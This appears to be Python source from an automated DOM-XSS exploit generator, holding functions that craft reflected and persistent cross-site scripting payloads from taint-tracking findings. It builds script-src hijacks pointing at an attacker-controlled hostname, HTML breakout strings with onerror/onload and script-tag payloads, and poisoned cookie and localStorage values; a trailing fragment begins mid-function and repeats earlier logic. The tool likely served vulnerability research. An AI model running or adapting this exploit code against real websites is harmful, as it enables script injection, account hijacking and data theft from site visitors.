def get_script_src_exploit(finding): """ Generate exploit candidates which flow into the script src sink. :param finding: the finding to analyze :return: list of exploit candidates """ exploits = [] for source in finding["sources"]: script_src = finding["value"] if len(source["value_part"]) == 1: continue found = False original_script_src = script_src # we have found the complete value directly, just substitute it with a hostname under our control if script_src.startswith(source["value_part"]): payload = "https://" + SCRIPT_SOURCE_HOSTNAME + '/' found = True # check for relative URL if not script_src.startswith("http"): script_src = urljoin(finding["url"], script_src) parsed = urlsplit(script_src) if parsed.netloc == source["value_part"]: payload = SCRIPT_SOURCE_HOSTNAME + '/' found = True end_of_domain = len(parsed.scheme) + len("://") + len(parsed.netloc) script_src_diff = len(script_src) - len(original_script_src) # our value lies somewhere where we can influence the location if -1 < source["start"] + script_src_diff < end_of_domain: if source["end"] + script_src_diff < len(parsed.scheme) + len("://"): # but just in the protocol :( continue # replace the netlocation with our hostname payload = source["value_part"].replace(parsed.netloc, SCRIPT_SOURCE_HOSTNAME) # if it is not part of the initial value, just try to insert it anyway if parsed.netloc not in source["value_part"]: payload = "." + SCRIPT_SOURCE_HOSTNAME + '/' found = True # found = True => payload is defined if found: # if it is a reflected source, build reflected exploit candidate if source["source"] not in [SOURCES.SOURCE_COOKIE, SOURCES.SOURCE_LOCAL_STORAGE, SOURCES.SOURCE_SESSION_STORAGE]: exploit_urls = build_reflected_exploit(finding, payload, source["value_part"], source["source"]) # if it worked, we cann add it to our found exploits if exploit_urls is not None: exploits.append(createWebExploit(exploit_urls, source["id"])) else: # build a PCXSS exploit candidate # fetch the respective storage entries to check for our tainted value if source["source"] == SOURCES.SOURCE_COOKIE: storage_items = finding["storage"]["cookies"] else: storage_items = finding["storage"]["storage"] if len(storage_items) == 0: # we dont have any storage items recorded, so nothing to see continue matches = find_match(storage_items, source["value_part"]) # for each match in the storage entries we can generate a candidate for match in matches: matched_key, matched_value, matched_storage_value, fuzzy, addinfo = match if is_json(matched_storage_value): parsed = try_parse_json(matched_storage_value) else: parsed = None if parsed and matched_storage_value != source["value_part"]: # we need to replace the whole thing replace_value = matched_storage_value replace_with = recursive_replace(parsed, source["value_part"], payload) replace_with = json.dumps(replace_with) else: replace_value = matched_storage_value replace_with = replace_value.replace(source["value_part"], payload) if "quoted" in addinfo: try: replace_with = quote(replace_with) except KeyError: replace_with = manual_quote(replace_with) # check whether the substitution was indeed successful if 'alert' not in replace_with and SCRIPT_SOURCE_HOSTNAME not in replace_with: log("Substitution of script source PCXSS candidate did not work!") else: exploits.append( createPCXSSExploit(source["source_name"], matched_key, matched_storage_value, source["id"], replace_value, replace_with)) return exploits
def get_html_exploit(finding): """ Generate exploits for an HTML executing sink. :param finding: the finding to investigate :return: list of exploit candidates """ exploits = list() # our payload is a piece of Javascript, thus we need to prepare it into an HTML payload first validation_payload = CONFIG.payload payload = "<img src=foo onerror=%s onload=%s>" % (validation_payload, validation_payload) # textareas are the easiest way to breakin into HTML # since they catch anything up to the the closing tag of the current environment breakin = "<textarea>" # in instances where we can write script tags we can also simply resort to this simpler case if finding["sink_id"] in [SINKS.SINK_DOC_WRITE, SINKS.SINK_IFRAME_SRCDOC]: payload = "<script>%s</script>" % validation_payload try: # start generating the appropriate breakouts parser = HTMLStateMachine() prior_parsed = 0 # there are findings in which we have plenty sources which are just generating duplicate exploits # will only be vulnerable if a predecessor is also vulnerable, thus restrict to the 20 first for source in finding["sources"][:20]: # the complete value ending up in the sink value = finding["value"] # the specific part of the value originating from this source value_part = source["value_part"] # skip unreasonable values/sources which are not considered in our exploitation if source["value_part"] == "?": continue if source["source"] not in GENERATE_EXPLOIT_FOR_SOURCES: log("Skipping source with source_id {}!".format(source["source"])) continue if source["hasEscaping"] + source["hasEncodingURI"] + source["hasEncodingURIComponent"] > 0: log("Skipping source with encoding!") continue # offsets in the overall value taint_start, taint_end = source["start"], source["end"] # if this is not the case we have encoding problems in which case some bytes might be missing # thus we need to recalc the offset if value_part != value[taint_start:taint_end]: if value.count(value_part) == 1: taint_start = value.find(value_part) taint_end = taint_start + len(value_part) log('Mismatch in taint start info %s %s' % (taint_start, len(value))) else: continue # get the string part which resides between the current source and the prior parsed part of the string # then feed it into our state machine and use the resulting state as basis to generate the breakout string_to_parse = finding["value"][prior_parsed:taint_start] + source["value_part"] prior_parsed = taint_end log("Getting HTML breakout for %s (%s): %s" % (source["id"], string_to_parse, value_part)) # feeds the string to the parser and then outputs the breakout sequence breakout_sequence = getHTMLBreakout(parser, string_to_parse) log("Result: %s" % breakout_sequence) # TODO (ben) fix this bridge, not only rcxss but also pcxss and if we have only seen / we can do stuff # check if we are currently in the process of writing the src property of a script tag which we can hijack if len(parser.opened_tags) > 0: top_element = parser.opened_tags[0] if top_element.get("name", "").lower() == 'script' and len(top_element.get("attributes", [])): if (top_element.get("attributes")[0]).get("name", "") == 'src': url_so_far = urljoin(finding["url"], top_element["attributes"][0]["value"]) if url_so_far.count("/") < 3: # we control the origin, woohoo parsed = urlsplit(url_so_far) if parsed.netloc in source["value_part"] or source["value_part"] in parsed.netloc: payload = source["value_part"].replace(parsed.netloc, SCRIPT_SOURCE_HOSTNAME) breakout_sequence = "" exploit_url = build_reflected_exploit(finding, payload, source["value_part"], source["source"]) if exploit_url: exploits.append(createWebExploit(exploit_url, source["id"])) continue # We have a generated a breaout sequence and can make use of it now if breakout_sequence is not None: if source["source"] not in [SOURCES.SOURCE_COOKIE, SOURCES.SOURCE_LOCAL_STORAGE, SOURCES.SOURCE_SESSION_STORAGE]: # RCXSS # assemble the complete exploit candidate resulting_markup = value[:taint_start] + source[ "value_part"] + breakout_sequence + payload + breakin + value[taint_end:] assert resulting_markup != value working_exploit = False # check for exploitability try: soup = BeautifulSoup(resulting_markup, "html5lib") for script in soup.find_all("script"): # either we are injected into a script if script.text: if script.text == validation_payload: working_exploit = True # or part of a script src if "src" in script.attrs: parsed = urlsplit(script["src"]) if parsed.netloc.endswith(SCRIPT_SOURCE_HOSTNAME): working_exploit = True # or into the onload/onerror of an image for img in soup.find_all("img"): if "onload" in img.attrs and img["onload"].strip() == validation_payload: working_exploit = True except Exception, e: log('Error in parsing resulting payload of an HTML exploit {}'.format(e)) # We were not able to find our payload thus also we do not need to validate if not working_exploit: log("After substitution of HTML exploit, payload was non functional!") continue # we are building exploits for reflected source thus build the respective urls exploit_url = build_reflected_exploit(finding, source["value_part"] + breakout_sequence + payload + breakin, source["value_part"], source["source"]) if exploit_url is None: log('Unable to generate exploit URL for HTML RCXSS!') continue else: exploits.append(createWebExploit(exploit_url, source["id"])) else: # PCXSS # select the appropriate storage if source["source"] == SOURCES.SOURCE_COOKIE: storage_items = finding["storage"]["cookies"] else: storage_items = finding["storage"]["storage"] if len(storage_items) == 0: matches = None else: matches = find_match(storage_items, value_part) if matches is None and source["source"] == SOURCES.SOURCE_COOKIE and ";" in value_part: # document.cookie directly into sink exploits.append( createPCXSSExploit(source["source_name"], "___foobar___", None, source["id"], None, payload + breakin)) elif matches is None: log('Could not find the respective storage entry for an HTML PCXSS exploit!') else: # we actually have matches for match in matches: matched_key, matched_value, matched_storage_value, fuzzy, addinfo = match # TODO merge with above if matched_key in ("_parsely_visitor", "_parsely_session"): continue if is_json(matched_storage_value): parsed = try_parse_json(matched_storage_value) else: parsed = None # storage value is a dict if parsed: replace_value = matched_storage_value replace_with = recursive_replace(parsed, source["value_part"], source["value_part"] + breakout_sequence + payload + breakin) replace_with = json.dumps(replace_with) # the storage value is not a dictionary else: replace_value = matched_storage_value replace_with = replace_value.replace(source["value_part"], source["value_part"] + breakout_sequence + payload + breakin) if "quoted" in addinfo: try: replace_with = quote(replace_with) except KeyError: replace_with = manual_quote(replace_with) if replace_with == replace_value: continue # FIXME what could possibly go wrong here if you change the payload to something malicious ;) if "alert" not in replace_with and "persistent" not in replace_with: log('Failed to find HTML exploit after substitution for PCXSS JS exploit!') continue exploits.append( createPCXSSExploit(source["source_name"], matched_key, matched_storage_value, source["id"], replace_value, replace_with)) except Exception as e: log("ERR {} {}".format(e, finding["finding_id"])) return exploits
replace_with = CONFIG.payload if "quoted" in addinfo: replace_with = quote(replace_with) replace_value = matched_storage_value exploits.append( createPCXSSExploit(source["source_name"], matched_key, matched_storage_value, source["id"], replace_value, replace_with)) continue # only storage value is a dict, thus we need to replace the value recursively into the dict if isinstance(parsed, dict): replace_value = matched_storage_value replace_with = recursive_replace(parsed, source["value_part"], source["value_part"] + payload) replace_with = json.dumps(replace_with) # the storage value is not a dictionary, thus resort to normal string replace else: replace_value = matched_storage_value replace_with = replace_value.replace(source["value_part"], source["value_part"] + payload) if "quoted" in addinfo: replace_with = quote(replace_with) if replace_with == replace_value: continue # FIXME what could possibly go wrong here if you change the payload to something malicious ;) if "alert" not in replace_with and "persistent" not in replace_with: log('Failed to find js exploit after substitution for PCXSS JS exploit!')